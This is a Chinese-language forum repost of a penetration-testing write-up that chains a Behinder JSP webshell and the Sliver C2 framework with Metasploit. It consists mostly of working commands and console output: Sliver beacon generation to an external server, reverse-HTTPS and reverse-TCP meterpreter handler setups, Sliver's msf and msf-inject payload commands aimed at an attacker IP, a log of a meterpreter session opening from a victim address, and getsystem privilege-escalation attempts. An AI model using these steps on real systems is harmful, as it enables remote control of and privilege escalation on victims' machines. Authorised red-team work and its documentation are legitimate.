本帖最后由 jiangmingzi 于 2023-9-27 18:14 编辑
信安404 2023-09-27 08:01 发表于天津
0x0前言这篇文章的背景是在某次授权渗透的情况下,使用了sliver,但由于sliver的生态还没有Cobalt Strike成熟。所以想到用sliver来联动msf。截至写这篇文章的时候,也就是2023.9.25,发现网上还没有sliver联动的相关文章,所以这里写一下记录和一些坑点。 0x1 冰蝎联动MSF冰蝎是提供一键联动MSF功能的,但这里有个坑点,使用什么类型的webshell,就需要配置什么类型的payload。看图可以看出,我使用的jsp的webshell,所以冰蝎和msf都需要配置和监听(使用)相同的payload 如果你是php的webshell,那么两头都需要同时配置。 - root@silver:/tmp# msfconsole
- msf > use exploit/multi/handler
- msf exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
- payload => java/meterpreter/reverse_tcp
但其实通过webshell联动的msf有很多弊端,因为MSF的会话是从jsp的webshell派生出去的,所以在笔者进行提权的时候,很多payload会提示不支持,所以,不到万不得已的时候,不考虑从webshell去连msf。 0x2 冰蝎&&sliver先上线sliver,上篇文章上线的全是Linux,这次正好打了一台windows ,所以也正好测试一下。 - sliver > generate --mtls xxx.xxx.store:60001 --os windows --max-errors 99999 beacon
生成beacon之后,通过冰蝎上传,再执行。 0x2 sliver联动MSFsliver是提供原生态的msf连接的。有两种方式,一种是msf ,另外一种是msf-inject - sliver (CRUCIAL_ANT) > msf
- msf msf-inject
sliver(msf)msf不依赖进程,直接创建一个新的进程去与msf联动 (理论上应该先开启msf的监听,注意下顺序) - sliver (CRUCIAL_ANT) > msf --help
- Command: msf [--lhost] <options>
- About: Execute a metasploit payload in the current process.
- Usage:
- ======
- msf [flags]
- Flags:
- ======
- -e, --encoder string msf encoder
- -h, --help display help
- -i, --iterations int iterations of the encoder (default: 1)
- -L, --lhost string listen host
- -l, --lport int listen port (default: 4444)
- -m, --payload string msf payload (default: meterpreter_reverse_https)
- -t, --timeout int command timeout in seconds (default: 60)
- sliver (CRUCIAL_ANT) > msf --lhost 104.244.xxx.xxx --lport 9091 #这里开始连接
这里需要注意,sliver(msf)默认是使用windows/meterpreter/reverse_https,所以msf需要配置为
- set payload windows/meterpreter/reverse_https
笔者没有测试其他的payload,感兴趣的时候,可以自行测试。 - msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
- payload => windows/meterpreter/reverse_https
- msf6 exploit(multi/handler) > set lport 9091
- lport => 9091
- msf6 exploit(multi/handler) > run
- Started HTTPS reverse handler on https://104.244.xx.xx:9091
- [!] https://104.244.xx.178:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Without a database connected that payload UUID tracking will not work!
- https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Redirecting stageless connection from /gTKpn_XtlYyiqqOox7p-uQogDVenEnB9BtINB5lY with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51'
- [!] https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Without a database connected that payload UUID tracking will not work!
- https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Attaching orphaned/stageless session...
- [!] https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Without a database connected that payload UUID tracking will not work!
- Meterpreter session 2 opened (104.244.xx.xx:9091 -> 189.46.xx.xx:62584) at 2023-09-24 18:02:29 -0700
- meterpreter > getsystem
- [-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
- [-] Named Pipe Impersonation (In Memory/Admin)
- [-] Named Pipe Impersonation (Dropper/Admin)
- [-] Token Duplication (In Memory/Admin)
- [-] Named Pipe Impersonation (RPCSS variant)
- [-] Named Pipe Impersonation (PrintSpooler variant)
- [-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
sliver(msf-inject)msf-inject 需要指定一个本地有权限并且有会话的进程的与msf联动。笔者猜测应该是注入进程,达到隐藏会话的目的
唯一与sliver(msf)不同的是,msf-inject需要指定进程pid。 - sliver (CRUCIAL_ANT) > msf-inject --lhost 104.244.xx.xx --lport 9091 --pid 9352
- [!] Empty response from msf payload injection task上面为sliver 控制台操作MSF配置如下
- msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
- payload => windows/meterpreter/reverse_https
- msf6 exploit(multi/handler) > set lport 9091
- lport => 9091
- msf6 exploit(multi/handler) > run
提示Empty response from msf payload injection task笔者当时以为没有成功,但是切回去一个窗口,已经收到会话了。 0x4 后记这篇文章没有什么难度,只是记录了一些sliver 冰蝎与msf之间联动的一些坑.sliver 还有很多实实在在的有趣的功能,有机会可以写写随笔记录一下常用功能.
| 
发表于 2023-9-27 18:14:57